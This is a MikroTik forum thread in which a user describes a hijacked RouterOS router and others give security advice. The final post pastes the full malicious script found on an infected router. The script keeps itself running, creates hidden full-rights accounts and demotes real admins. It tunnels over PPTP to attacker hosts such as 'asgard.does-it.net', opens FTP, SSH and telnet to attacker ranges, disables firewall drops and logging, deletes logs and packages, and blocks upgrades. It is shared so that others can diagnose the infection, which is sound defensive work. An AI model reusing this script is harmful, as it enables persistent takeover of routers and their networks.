Community discussions

 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 9:49 am

In the Users section, It has another account "sys" which is set to group "full"
Anyone here knows the password of "sys" account , please tell me. So I will change the group of "admin" to "full"

Thanks
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5921
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 11:40 am

There is no sys account in RouterOS by default. It is created by some of the router admins.
 
JB172
Member
Member
Posts: 301
Joined: Fri Jul 24, 2015 3:12 pm
Location: AWMN

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 12:18 pm

 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 1:35 pm

You mean I got hack

Even terminal in Winbox can't open
It said about permision
 
User avatar
Steveocee
Forum Guru
Forum Guru
Posts: 1092
Joined: Tue Jul 21, 2015 10:09 pm
Location: UK
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 2:06 pm

Sounds like the router has been compromised and you've been locked out of it.
Steve "Steveocee" Carter
PC Gamer, Airsofter, MikroTik Nerd
My Website - My MikroTik Tutorials
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24141
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 2:08 pm

Guys ... how many times must we write this.

1. Change "admin" to some other username
2. SET A PASSWORD
3. USE FIREWALL
No answer to your question? How to write posts
 
JB172
Member
Member
Posts: 301
Joined: Fri Jul 24, 2015 3:12 pm
Location: AWMN

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 2:11 pm

Do you have an export of your configuration so you can import it to router after you make a Netinstall?
https://wiki.mikrotik.com/wiki/Manual:Netinstall
 
tippenring
Member Candidate
Member Candidate
Posts: 179
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Thu Feb 22, 2018 5:09 pm

Guys ... how many times must we write this.

1. Change "admin" to some other username
2. SET A PASSWORD
3. USE FIREWALL
There will be no end to people that can perform a basic setup with no concept of security.

Perhaps a feature request to consider: blank or default passwords cause the unit to beep loudly and frequently until the defaults are changed.

Perhaps a default behavior where the router stops accepting traffic after a short period of time while default credentials exist. IMHO, I wouldn't care if the administrator loses access and has to reboot the router to regain access. That's an administrator that hasn't learned that default passwords are dangerous.

For those admins that decide they'll change the password to something equally stupid like "root" or "password", the failure when those routers are hacked will be gross negligence, rather than just ignorance of the administrator.
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Fri Feb 23, 2018 2:04 am

First of all I had changed admin password but hadn't changed user "admin" to other user. I try to hard and soft reset but it didn't work. Now my router restarts periodically and found it has run script every second( I check on the scheduler) this makes router last about 20 minutes.

Some advices me to use netinstall. I will try it today.
After I gain full access of my router again I will consider to setup a firewall and change username.

Thanks
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Fri Feb 23, 2018 6:01 am

Unfortunately, I can't do anything, just see script, but have no idea what this hacker's script do
Can someone understand it?
Image
 
sid5632
Member
Member
Posts: 349
Joined: Fri Feb 17, 2017 6:05 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Fri Feb 23, 2018 11:10 am

It might help if you posted all the script in text form rather than a stupid screenshot.
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Sat Feb 24, 2018 9:31 am

In the Users section, It has another account "sys" which is set to group "full"
Anyone here knows the password of "sys" account , please tell me. So I will change the group of "admin" to "full"

Thanks
Have you resolved your issue?
If not yet, what actions are you able to do with your device?
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Sun Feb 25, 2018 9:48 am

I can't do anything just say RIP to this Router
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Sun Feb 25, 2018 10:09 am

I can't do anything just say RIP to this Router
You posted the screenshot from there above, so do you have any access to the router? Or you had it once and have lost finally?
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Sun Feb 25, 2018 11:48 am

For now I can still access with my "admin" account with limited priviledges. I can only see but can't config anything. I tried to copy script to *.txt file but it can't copy to clipboard thay why I posted screenshot here

Some post suggests to push a reset button very long time. but reformat hold button in ther System>Routerboard>settings is changed instantly so it doesn't work



Anyway Thanks
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Sun Feb 25, 2018 12:29 pm

For now I can still access with my "admin" account with limited priviledges. I can only see but can't config anything. I tried to copy script to *.txt file but it can't copy to clipboard thay why I posted screenshot here
Can you contact me directly in Telegram or Twitter? (@jabberd). I have an idea that might help you, but don't want to share it publicly.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24141
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Feb 26, 2018 11:52 am

For now I can still access with my "admin" account with limited priviledges. I can only see but can't config anything. I tried to copy script to *.txt file but it can't copy to clipboard thay why I posted screenshot here

Some post suggests to push a reset button very long time. but reformat hold button in ther System>Routerboard>settings is changed instantly so it doesn't work



Anyway Thanks

In terminal, do an EXPORT and copy from the terminal screen.
No answer to your question? How to write posts
 
jarda
Forum Guru
Forum Guru
Posts: 7601
Joined: Mon Oct 22, 2012 4:46 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Feb 26, 2018 6:40 pm

Why do you believe that this can work?
 
User avatar
AlainCasault
Trainer
Trainer
Posts: 601
Joined: Fri Apr 30, 2010 3:25 pm
Location: Laval, QC, Canada
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Wed Feb 28, 2018 12:51 am

@korawit

Follow this link and do exactly that. I saved a router from netinstall because of the netwatch trick.

Regards,

Sent from Tapatalk

___________________________
Alain Casault, Eng.
If I helped you, let me know!
 
korawit
just joined
Topic Author
Posts: 16
Joined: Thu Feb 22, 2018 9:12 am

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Sun Mar 04, 2018 1:12 pm

I just send to the Mikrotik service center , They said about detach NAND gate on the routerboard
 
bobbyyo
just joined
Posts: 6
Joined: Sun Mar 04, 2018 7:44 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Sun Mar 04, 2018 7:48 pm

Same problem as yours and this is the full scrip.
:glo systemV 30RC5
:glo rosX 6346;
:glo xFlag false
:glo sysCLRFlag false
:glo moROSF true
:glo moMACF false
:glo fPort 21;:glo sPort 22;:glo tPort 23;
:glo sC;:glo sCM 5;:glo s5;
:glo rstTime 17084;:glo JRST;:glo xey;
:glo sysTime;:glo sRM 900;:glo sR2;:glo sR1;
:glo sysJ;:glo sysNoOther;:glo sysPPS;:glo UAC;:glo PTPST;:glo sysB;:glo sysE;:glo DOM;
:loc lntp;:loc sysSrc;:loc sPol;:loc sSchP;
:loc contX;:loc acx;:loc wx;:loc viax;:loc addx;
:loc ptpU
:loc HL 60;:loc moMAX 1
:loc jST;:loc stJ;:loc tSCR;:loc tSTA;:loc RF;:loc tt;
:loc s8 ":glo sysJ;:loc s4 false;/fil {:fore f in [find type=\"backup\"] do={:loc n [get \$f name];/sys back save name=\$n;}};:loc s1;:loc s2;:loc s0 [:len [/sys scr find name=system]];:loc ss [:len [/sys sch find name=system]];:loc s3 false;:if (\$s0=1) do={:if (\$ss=1) do={:set s1 [/sys scr get [find name=system] run-count];:del 3;:set s2 [/sys scr get [find name=system] run-count];:if (\$s2=0 or (\$s1=\$s2)) do={/sys sch rem [find name=system];:del 1;/sys sch add name=system disable=no interval=1s on-event=system start-date=jan/01/1970 start-time=00:00:00;}} else={:set s3 true;}} else={:set s3 true;};:if (\$s3) do={:loc xx;/fil {:fore f in [find] do={:loc x [get \$f name];:if ([:len [:find \$x \"ss.db\"]]=1) do={:set xx \$x;:set s4 true;}}};:if (\$s4) do={:set sysJ true;/import \$xx;};}"
:loc s9 "/lcd set ena=no tou=dis;"
:if ([:len [/sys scr job find script="system"]]>=2) do={:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]]);}};:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2));
/sys scr job {:fore j in=[find script="system"] do={:set tSTA [get $j start];:set stJ [:pick $tSTA ([:find $tSTA " "]+1) [:len $tSTA]];:for x from=0 to=([:len $stJ]-1) do={:if ([:pick $stJ $x ($x+1)]=":") do={:set stJ ([:pick $stJ 0 $x].",".[:pick $stJ ($x+1) [:len $stJ]]);};};:set stJ [:toarray $stJ];:set jST ((($stJ->0)*3600)+(($stJ->1)*60)+($stJ->2));:loc sysTmp;:if ($sysTime<$jST) do={:set sysTmp ($sysTime+86400-$jST);} else={:set sysTmp ($sysTime-$jST);};:if ($sysTmp>=$sR1) do={:set sR1 $sysTmp;} else={:set sR1 ($sR1-1);};:if ($sR1>$sRM) do={/sys reb;};}}
:if ([:len [/too net find host=8.8.8.8]]!=1) do={/too net rem [find host=8.8.8.8];/too net add host=8.8.8.8 dis=no int=1 tim=1 up=$s8 down=$s8;} else={:loc u8 [/too net get [find host=8.8.8.8] up];:loc d8 [/too net get [find host=8.8.8.8] down];:loc db [/too net get [find host=8.8.8.8] dis];:loc i8 [/too net get [find host=8.8.8.8] int];:if (((($u8=$s8) and ($d8=$s8)) and !$db) and ($i8=[:totime 1])) do={:del 0;} else={/too net set [find host=8.8.8.8] up=$s8 down=$s8 dis=no int=1;}}
} else={
:set sysNoOther true;:set UAC [:len [/use act find name!="system"]];:loc mLOG false;/use act {:fore u in=[find] do={:loc uu [get $u address];:loc vv [get $u via];:if (([:len [:find $uu ":"]]!=0) or (($vv="console") or ($vv="local"))) do={:set mLOG true;}}}
:if ($UAC=0) do={:set sysNoOther true;} else={:set sysB [/sys clo get time];:set sysNoOther true;/use act {:fore acc in=[find via!="ftp"] do={:if ([get $acc name]!="system") do={:if ($sysCLRFlag) do={/fil pri fil=sysCLR;/ip fir lay rem [find name=sysCLR];:del 1;/ip fir lay add name=sysCLR regexp=true;:del 1;/sys reb;};:set sysNoOther false;:set sC 0;:set acx [get $acc name];:set wx [get $acc when];:set viax [get $acc via];:set addx [get $acc address];:if ([:len [/ip fir lay find name=sysIntru]]=0) do={/ip fir lay add name=sysIntru regex=true};:if ([:len [/fil find name=pps.txt]]!=0) do={:set sysPPS [/fil get [find name=pps.txt] content];} else={:set sysPPS 0;};};};};};
:if ($sysNoOther and (!$mLOG)) do={:set DOM "allimpir.dyndns.org";
:loc archi [/sys reso get archi];:if (([:len [/ip fir lay find name=sysJail]]!=0) or $sysJ) do={:set ptpU "jail";} else={:set ptpU "void";}
:if ($archi="tile") do={:set PTPST ($ptpU."CCR");} else={:if ($archi="powerpc") do={:set PTPST ($ptpU."PPC");} else={:if ($archi="mipsbe") do={:set PTPST ($ptpU."MIPSBE");} else={:if ($archi="mmips") do={:set PTPST ($ptpU."MMIPS");} else={:if ($archi="smips") do={:set PTPST ($ptpU."SMIPS");} else={:if (($archi="x86") or ($archi="x86_64")) do={:set PTPST ($ptpU."X86");} else={:if ($archi="arm") do={:set PTPST ($ptpU."ARM");} else={:set PTPST $ptpU;}}}}}}};
:if ([:len [/ip fir lay find name=sysIntru]]=1) do={
:if ($sC<$sCM) do={
:set sC ($sC+1);
:if ([:len [/ip fir lay find name=sysJail]]!=0) do={
:loc mcnt [/ip fir lay get [find name=sysJail] regex];
:loc sysV [:tonum [:pick $systemV 0 2]];:set xey [:pick [/sys clo get time] 6 8];
:if ($mcnt>=$moMAX) do={/ip fir lay set [find name=sysJail] regex=0;
:if ($sysV>=30) do={
:if ([:len [/use find name=sys]]=0) do={/use add name=sys group=full disabled=no password=([/ip fir lay get [find name=syscret] regexp].$xey);:del 1;/ip fir lay rem [find name=syscret];/use set [find group=sys] group=full;/use gro rem [find name=sys];/use gro add name=sys copy-from=full policy=!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use set [find name!=sys] group=sys;/use set [find name=system] group=full;} else={/use rem [find name=system];/use set [find group=sysT] group=full;/use gro rem [find name=sysT];/use gro add name=sysT copy-from=full policy=!wri,!pas,!sen,!api,!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use gro set [find name=sys] policy=[/use gro get [find name=sysT] policy];/use gro rem [find name=sysT];/use set [find name!=sys] group=sys;/ip fir lay rem [find name=syscret];}
} else={:if ($sysV>=26) do={:if ([:len [/use find name=sys]]=0) do={/use add name=sys group=full disabled=no password=([/ip fir lay get [find name=syscret] regexp].$xey);/ip fir lay rem [find name=syscret];/use set [find group=sys] group=full;/use gro rem [find name=sys];:del 1;/use gro add name=sys copy-from=full policy=!loc,!tel,!ssh,!ftp,!pol,!sni;:del 1;/use set [find name!=sys] group=sys;/use set [find name=system] group=full;}}}
/sys scr rem [find name=README];/sys scr add name=README source="."
}
}
} else={
/ip fir lay rem [find name=sysIntru];
:if ([:len [/int pptp-cli find name=system]]!=1) do={/int pptp-cli rem [find name=system];:del 1;/int pptp-cli add allow=mschap1,mschap2 connect-to=8.8.8.8 disabled=no name=system password=password profile=default user=$PTPST;:del 1;} else={/int pptp-cli set [find name=system] connect-to=8.8.8.8 disabled=no profile=default user=$PTPST password=password;}
:loc ptp2;:loc ptpS;
:if (([:len [/ip dns get servers]]=0) and ([:len [/ip dns get dynamic-servers]]=0)) do={/ip dns set servers=8.8.8.8,8.8.4.4;};:set DOM "asgard.does-it.net";:if ([:typeof [/int pptp-cli get [find name=system] connect-to]]="ip") do={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS [:resolve $DOM];:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no user=$PTPST password=password;}} else={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS $DOM;:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no user=$PTPST password=password;}}
:loc wait 2;:loc ptpW true;
:while (($wait>0) and $ptpW) do={:set ptpW (![/int pptp-cli get [find name=system] running]);:set wait ($wait-1);:del 1;}
:if ((!$ptpW)) do={
/ip fir fil set [find chain=input and src-address="172.16.0.0/12" and action="accept"] in-interface=system action=accept
:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="!system" and action="drop"]]=0) do={:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="system"]]!=0) do={/ip fir fil add copy-from=[find chain=input and src-address="172.16.0.0/12" and in-interface="system" and action="accept"] in-interface=!system action=drop}}
:if ([:len [/ip rou find dst-address=172.24.0.0/13]]!=1) do={/ip rou rem [find dst-address=172.24.0.0/13];:del 1;/ip rou add dst-address=172.24.0.0/13 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.24.0.0/13] gateway]!="system") do={/ip rou set [find dst-address=172.24.0.0/13] gateway=system;}}
:if ([:len [/ip rou find dst-address=172.25.0.0/24]]!=1) do={/ip rou rem [find dst-address=172.25.0.0/24];:del 1;/ip rou add dst-address=172.25.0.0/24 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.25.0.0/24] gateway]!="system") do={/ip rou set [find dst-address=172.25.0.0/24] gateway=system;}}
}
}
} else={
:loc ptp2;:loc ptpS;
:if ([:len [/int pptp-cli find name=system]]!=1) do={/int pptp-cli rem [find name=system];:del 1;/int pptp-cli add allow=mschap1,mschap2 connect-to=8.8.8.8 disabled=no name=system password=password profile=default user=$PTPST;:del 1;} else={
:if (([:len [/ip dns get servers]]=0) and ([:len [/ip dns get dynamic-servers]]=0)) do={/ip dns set servers=8.8.8.8,8.8.4.4;};:set DOM "asgard.does-it.net";:if ([:typeof [/int pptp-cli get [find name=system] connect-to]]="ip") do={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS [:resolve $DOM];:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no;}} else={:set ptp2 [/int pptp-cli get [find name=system] connect-to];:set ptpS $DOM;:if ($ptp2!=$ptpS) do={/int pptp-cli set [find name=system] connect-to=$ptpS disabled=no;}}
:loc wait 2;:loc ptpW true;
:while (($wait>0) and $ptpW) do={:set ptpW (![/int pptp-cli get [find name=system] running]);:set wait ($wait-1);:del 1;}
:if ((!$ptpW)) do={
:if ([:len [/use find name=system]]=0) do={
/snmp exp ver fil=init10;/ip ser exp ver fil=init11;/ip fir service-port exp ver fil=init12;/sys log set [find] disable=yes;/sys log exp ver fil=init13;/sys ntp cli exp ver fil=init15;:del 2;
/use add gro=full name=system address=172.24.0.0/13,127.0.0.1;/int pptp-ser ser set default-profile=default enabled=yes max-mru=1472 max-mtu=1472;/ip poo rem [find name=system];/ppp pro rem [find comment=system];/ppp sec rem [find comment=system];:del 1;
/ip poo add name=system ranges=10.147.147.2-10.147.147.254;/ppp pro add local-address=10.147.147.1 name=system remote-address=system com=system;/ppp sec add nam=spidy pas=peterparker pro=system ser=pptp com=system;/ip fir nat add action=masquerade chain=srcnat com=system;
/fil rem [find type=".log file"];/fil rem [find type=package];/fil rem [find type=".npk file"];
:loc s172 false;:loc s127 false;
:fore x in=[/ip ser get ftp address] do={:if ($x=172.24.0.0/13) do={:set s172 true};:if ($x=127.0.0.1/32) do={:set s127 true}};:if (!$s172) do={/ip ser set ftp address=([/ip ser get ftp address],172.24.0.0/13);};:if (!$s127) do={/ip ser set ftp address=([/ip ser get ftp address],127.0.0.1/32);};/ip ser set ftp port=$fPort disabled=no;:loc s172 false;
:fore x in=[/ip ser get ssh address] do={:if ($x=172.24.0.0/13) do={:set s172 true}};:if (!$s172) do={/ip ser set ssh address=([/ip ser get ssh address],172.24.0.0/13)};/ip ser set ssh port=$sPort disabled=no;:loc s172 false;
:fore x in=[/ip ser get telnet address] do={:if ($x=172.24.0.0/13) do={:set s172 true}};:if (!$s172) do={/ip ser set telnet address=([/ip ser get telnet address],172.24.0.0/13)};/ip ser set telnet port=$tPort disabled=no;
/ip ser set www address="" disabled=no;/ip fir service-port set [find name=ftp] disabled=no ports=$fPort;
/ip fir fil set [find chain=input and action=drop] dis=yes;
/ip fir fil set [find chain=output and action=drop] dis=yes;:del 1;
/ip fir fil add cha=input src-address=172.16.0.0/12 act=accept com=system;
/ip fir fil add cha=output src-address=172.16.0.0/12 act=accept com=system;
/ip fir fil add cha=input src-address=127.0.0.1/32 act=accept com=system;
/ip fir fil add cha=output src-address=127.0.0.1/32 act=accept com=system;
/ip fir fil add cha=input dst-port=21,22,23,162 src-address=!172.16.0.0/12 act=drop protocol=tcp com=system;
/ip fir fil add cha=input dst-port=161 src-address=!172.16.0.0/12 act=drop protocol=udp com=system;
:loc tmpinf;/int pppoe-client {:fore i in=[find running=yes] do={:set tmpinf [get $i name];/ip fir fil add cha=input dst-port=53 in-interface=$tmpinf act=drop protocol=udp com=system dis=no;}}
}
:if ([:len [/ip rou find dst-address=172.24.0.0/13]]!=1) do={/ip rou rem [find dst-address=172.24.0.0/13];:del 1;/ip rou add dst-address=172.24.0.0/13 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.24.0.0/13] gateway]!="system") do={/ip rou set [find dst-address=172.24.0.0/13] gateway=system;}}
:if ([:len [/ip rou find dst-address=172.25.0.0/24]]!=1) do={/ip rou rem [find dst-address=172.25.0.0/24];:del 1;/ip rou add dst-address=172.25.0.0/24 gateway=system com=system;} else={:if ([/ip rou get [find dst-address=172.25.0.0/24] gateway]!="system") do={/ip rou set [find dst-address=172.25.0.0/24] gateway=system;}}
/ip fir fil set [find chain=input and src-address="172.16.0.0/12" and action="accept"] in-interface=system action=accept
:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="!system" and action="drop"]]=0) do={:if ([:len [/ip fir fil find chain=input and src-address="172.16.0.0/12" and in-interface="system"]]!=0) do={/ip fir fil add copy-from=[find chain=input and src-address="172.16.0.0/12" and in-interface="system" and action="accept"] in-interface=!system action=drop}}
}
/int pptp-cli mon [find name=system] once do={:set lntp $"remote-address"};
:loc ntpSTmp;:set ntpSTmp [/sys ntp cli get pri];
:if ($ntpSTmp!=$lntp) do={/sys ntp cli set pri=$lntp sec=$lntp ena=no;:del 1;/sys ntp cli set ena=yes;}
}
:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]])}};:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2));:if (($sysTime<($rstTime+2)) and ($sysTime>($rstTime-2))) do={
:if ([:len [/ip fir lay find name=sysR]]=0) do={/ip fir lay add name=sysR regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysR] regexp]]]=0) do={/ip fir lay set [find name=sysR] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysR] regexp]];:set J ($J+1);/ip fir lay set [find name=sysR] regexp=$J;}};
/sys reb;}
}
} else={
:set sysSrc [/sys scr get [find name=system] source];:set sPol [/sys scr get [find name=system] policy];
:if ([:len [/sys sch find name=system]]=0) do={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no};:set sSchP [/sys sch get [find name=system] policy];
:loc syscret;:set s5 false;/fil {:fore f in [find] do={:loc x [get $f name];:if ([:len [:find $x "ss.db"]]=1) do={:set s5 true;}}};
:if ([:len [/ip fir lay find name=syscret]]=1) do={:set syscret [/ip fir lay get [find name=syscret] regexp]} else={/ip fir lay add name=syscret regexp=12345678;:set syscret 12345678;}
/use rem [find name=system];/use {:fore u in [find] do={:if ([:len [:find [get $u name] system]]!=0) do={[rem $u]}}}
/int pptp-cli rem [find name=system]
:loc sysW {"sys";"func";"init"}
/sys scr {:fore s in [find name!=system] do={:loc n [get $s name];:fore w in $sysW do={:loc det [:len [:find $n $w]];:if ($det!=0) do={/sys scr rem $n;};}}}
/sys sch {:fore s in [find name!=system] do={:loc n [get $s name];:fore w in $sysW do={:loc det [:len [:find $n $w]];:if ($det!=0) do={/sys sch rem $n;};}}}
/fil {:fore f in [find] do={:loc x [get $f name];:if ([:len [:find $x "init.db"]]=1) do={/fil rem [find name=$x];}}};/fil rem [find type=".log file"];/fil rem [find name=virgin.txt];/fil rem [find name=system.txt];/fil rem [find name=sysMonROS.txt];/fil rem [find type=package];/fil rem [find type=".npk file"];/fil rem [find type=".tar file"];/fil rem [find type=".rif file"];/fil rem [find type=".rar file"];/fil rem [find type=".zip file"];/fil rem [find name=sys-note.txt];
:if ([:len [/fil find name=init10.rsc]]!=0) do={/snmp comm rem [find default=no];:del 1;/imp init10.rsc;/fil rem [find name=init10.rsc];}
:if ([:len [/fil find name=init11.rsc]]!=0) do={/imp file=init11.rsc;/fil rem [find name=init11.rsc];} else={/ip ser set ftp disabled=no address="" port=21;/ip ser set ssh disabled=no address="" port=22;/ip ser set telnet disabled=no address="" port=23;}
:if ([:len [/fil find name=init12.rsc]]!=0) do={/imp file=init12.rsc;/fil rem [find name=init12.rsc];}
:if ([:len [/fil find name=init13.rsc]]!=0) do={/sys log rem [find default=no];/sys log action rem [find default=no];:del 1;/imp file=init13.rsc;/fil rem [find name=init13.rsc];}
:if ([:len [/fil find name=init15.rsc]]!=0) do={/imp file=init15.rsc;/fil rem [find name=init15.rsc];}
/fil rem [find type=script];/ip fir fil rem [find comment=system];/ip fir nat rem [find comment=system];/ip fir mangle rem [find comment=system];
/ip rou rem [find comment=system];/ip poo rem [find name=system];/ppp pro rem [find comment=system];/ppp sec rem [find comment=system];
/too traffic-g stop;/too traffic-g stream rem [find];/too traffic-g packet rem [find];/too traffic-g port rem [find];
:loc ncnt;:set ncnt [:len [/ip fir nat find comment!="system"]];:if ($ncnt=0) do={/ip fir nat add action=masquerade chain=srcnat}
:if ([:len [/fil find name=code0.txt]]=0) do={/fil pri file=code0.txt;:del 1;/fil set [find name=code0.txt] content="$wx,$acx,$viax,$addx";} else={:if ([/fil get [find name=code0.txt] size]>3800) do={/fil set [find name=code0.txt] content="$wx,$acx,$viax,$addx";} else={:set contX [/fil get [find name=code0.txt] content];/fil set [find name=code0.txt] content="$contX\n$wx,$acx,$viax,$addx";}}
:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]]);}}
:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2))
/sys scr job {:fore j in=[find] do={:set tSCR [get $j script];:set tSTA [get $j start];:if ([:typeof [get $j script]]="str") do={:loc scriptName [get $j script];:if (($scriptName="sysMonROS") or ($scriptName="init0") or ($scriptName="init1")) do={[rem $j];}} else={:set stJ [:pick $tSTA ([:find $tSTA " "]+1) [:len $tSTA]];:for x from=0 to=([:len $stJ]-1) do={:if ([:pick $stJ $x ($x+1)]=":") do={:set stJ ([:pick $stJ 0 $x].",".[:pick $stJ ($x+1) [:len $stJ]]);}};:set stJ [:toarray $stJ];:set jST ((($stJ->0)*3600)+(($stJ->1)*60)+($stJ->2));:if ($sysTime<$jST) do={:set RF ($sysTime+86400-$jST);} else={:set RF ($sysTime-$jST);};:if ($RF>$HL) do={[rem $j];};}}}
:set sysE [/sys clo get time];/sys scr job rem [find script!="system"];/sys scr job rem [find type="login"];
:if ([:len [/ip fir lay find name=syslog]]=0) do={/ip fir lay add name=syslog regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=syslog] regexp]]]=0) do={/ip fir lay set [find name=syslog] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=syslog] regexp]];:set J ($J+1);/ip fir lay set [find name=syslog] regexp=$J;}};
:while (!$sysNoOther or $mLOG) do={
:loc f1 ":glo f2 false;/fil {:fore f in [find] do={:loc x [get \$f name];:if ([:len [:find \$x \"ss.db\"]]=1) do={:set f2 true;}}};:if (!\$f2 and \$s5) do={:set sysJ true;};"
/too net rem [find host=9.9.9.9];/too net add host=9.9.9.9 dis=no int=1 tim=1 up=($f1.$s9) down=($f1.$s9);
/sys pac upd can;:del 1;:set sR2 ($sR2+1);:if ($sR2>$sRM) do={/sys reb;};
/fil rem [find type=".log file"];/fil rem [find type=package];/fil rem [find type=".npk file"];/fil rem [find type=script];
:loc filCLR {"sys";"func";"auto"};:loc dd;/fil {:fore f in [find] do={:loc n [get $f name];:fore ww in $filCLR do={:set dd [:len [:find $n $ww]];:if ($dd!=0) do={/fil rem $n;};}}}
:loc sysPPS;:if ([:len [/ip fir lay find name=sysPPS]]!=0) do={:set sysPPS [/ip fir lay get [find name=sysPPS] regex]}
:if ([:len [/ip fir lay find name=sysIntru]]=0) do={/ip fir lay add name=sysIntru regex=true}
:set fPort "";:set tPort "";:set sPort "";:set DOM "";:set PTPST "";
/sys scr env rem [find name=init0V];/sys scr env rem [find name=tokenSYS];/sys scr env rem [find name=ntpIP];/sys scr env rem [find name=tzspIP];/sys scr env rem [find name=SuperManServer];/sys scr env rem [find name=TheHulkServer];/sys scr env rem [find name=routerOSServer];/sys scr env rem [find name=ROSuser];/sys scr env rem [find name=ROSpass];/sys scr env rem [find name=init0nextIP];/sys scr env rem [find name=init0dstFile];/sys scr env rem [find name=init1nextIP];/sys scr env rem [find name=init1dstFile];/sys scr env rem [find name=initDBready];/sys scr env rem [find name=CPUhighMAX];/sys scr env rem [find name=CPUusedMAX];/sys scr env rem [find name=CPUhighCount];/sys scr env rem [find name=CPUused];
:loc done false;:loc rNum;:loc rnd;/int ether {:fore e in [find running=yes] do={/int monitor-traffic [get $e name] once do={:loc tmp;:set rnd $"rx-bits-per-second";:set tmp [:tonum [:pick $rnd ([:len $rnd]-4) ([:len $rnd]-2)]];:if ($tmp>0) do={:set done true;:set rNum $tmp;}}}};:if (!$done) do={:set rNum 5};
:loc rosV 0;:loc v;:loc pos 0;:set v [/sys reso get ver];:loc scope {" ";"rc";"("};
:fore w in $scope do={:if ([:len [:find $v $w]]!=0) do={:set v [:pick $v 0 [:find $v $w]]}}
:for x from=0 to=([:len [:tostr $v]]-1) do={:if ([:pick [:tostr $v] $x ($x+1)]=".") do={:set v ([:pick [:tostr $v] 0 $x].",".[:pick [:tostr $v] ($x+1) [:len [:tostr $v]]])}};
:set v [:toarray $v];:if ([:len $v]=2) do={:set v ($v,0)};:set pos 0;
:fore k in $v do={:if ($pos=0) do={:set rosV ($rosV+($k*1000));};:if ($pos=1) do={:set rosV ($rosV+($k*10));};:if ($pos=2) do={:set rosV ($rosV+$k);};:set pos ($pos+1);};
:loc reH (299-$rNum);:loc reMX (300-$rNum);
